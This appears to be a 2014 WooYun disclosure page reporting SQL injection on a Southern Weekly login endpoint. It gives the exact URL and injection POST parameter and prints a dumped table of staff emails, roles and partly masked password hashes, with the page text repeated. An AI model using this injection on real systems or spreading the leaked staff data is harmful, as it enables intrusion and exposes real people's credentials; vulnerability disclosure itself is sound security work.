南方周末某站点SQL注入 | wooyun-2014-078841| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078841

漏洞标题：南方周末某站点SQL注入

漏洞作者： m1x7e1

提交时间：2014-10-10 14:53

修复时间：2014-10-15 14:54

公开时间：2014-10-15 14:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-10-10：细节已通知厂商并且等待厂商处理中
2014-10-15：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

南方周末

详细说明：

http://tui.infzm.com/?a=index&c=login
POST：login%5bname%5d=s'"&login%5btoken%5d=111

-----------------------------+---------------------+
| 1  | boss   | lili@infzm.com              | 4ce3edec**********c937db1d110 |
 lili                        | 2013-04-11 10:34:25 |
| 4  | boss   | lixj@infzm.com              | 0f5f6749**********5d16c9d5d |
 lixj                        | 2014-09-23 17:06:34 |
| 20 | boss   | wusj@infzm.com              | b9368a144c**********eff7acdd8 |
 wushuijie                   | 2014-09-25 10:23:33 |
| 27 | editor | qiuyan@infzm.com            | 9a0f417b003**********6bf6d49e2 |
 qiuyan                      | 2014-09-24 17:03:22 |
| 28 | editor | lijn@infzm.com              | 040ce59c3**********349f7519c |
 lijianing                   | 2014-09-25 09:31:14 |
| 31 | boss   | lisg@infzm.com              | b34298d76**********f8a296 |
 lisg                        | 2014-10-06 21:47:10 |
| 32 | editor | flyingwater1983@hotmail.com | <blank>                          |
 flyingwater1983@hotmail.com | 2014-09-26 11:08:04 |
| 33 | editor | caibm@infzm.com             | <blank>                          |
 caibm@infzm.com             | 2014-09-26 11:08:04 |
| 34 | editor | chenll@infzm.com            | <blank>                          |
 chenll@infzm.com            | 2014-09-26 11:08:04 |
| 35 | boss   | shizhe@infzm.com            | 199da9c35**********aeae |
 shizhe                      | 2014-09-26 11:07:18 |
| 36 | boss   | liuys@infzm.com             | <blank>                          |
 liuys@infzm.com             | 2014-09-27 15:54:40 |
+----+--------+-----------------------------+----------------------------------+
-----------------------------+---------------------+

漏洞证明：

见详细说明

修复方案：

过滤

版权声明：转载请注明来源 m1x7e1@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-10-15 14:54

厂商回复：

漏洞评价：

2014-10-10 21:38 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云，知恩不忘，其实我一直都在乌云默...)

南方周末日报采访您！
2014-10-11 10:33 | 机器猫 ( 普通白帽子 | Rank:1141 漏洞数:253 | 爱生活、爱腾讯、爱网络！)

摄像大哥哥，来把机子朝这里挪挪！
2014-10-16 09:53 | 海绵君 ( 路人 | Rank:2 漏洞数:1 )

妈妈，我要上电视了。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078841

漏洞标题：南方周末某站点SQL注入

相关厂商：南方周末

漏洞作者： m1x7e1

提交时间：2014-10-10 14:53

修复时间：2014-10-15 14:54

公开时间：2014-10-15 14:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 m1x7e1@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-078841

漏洞标题：南方周末某站点SQL注入

相关厂商：南方周末

漏洞作者： m1x7e1

提交时间：2014-10-10 14:53

修复时间：2014-10-15 14:54

公开时间：2014-10-15 14:54

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-078841"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 m1x7e1@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：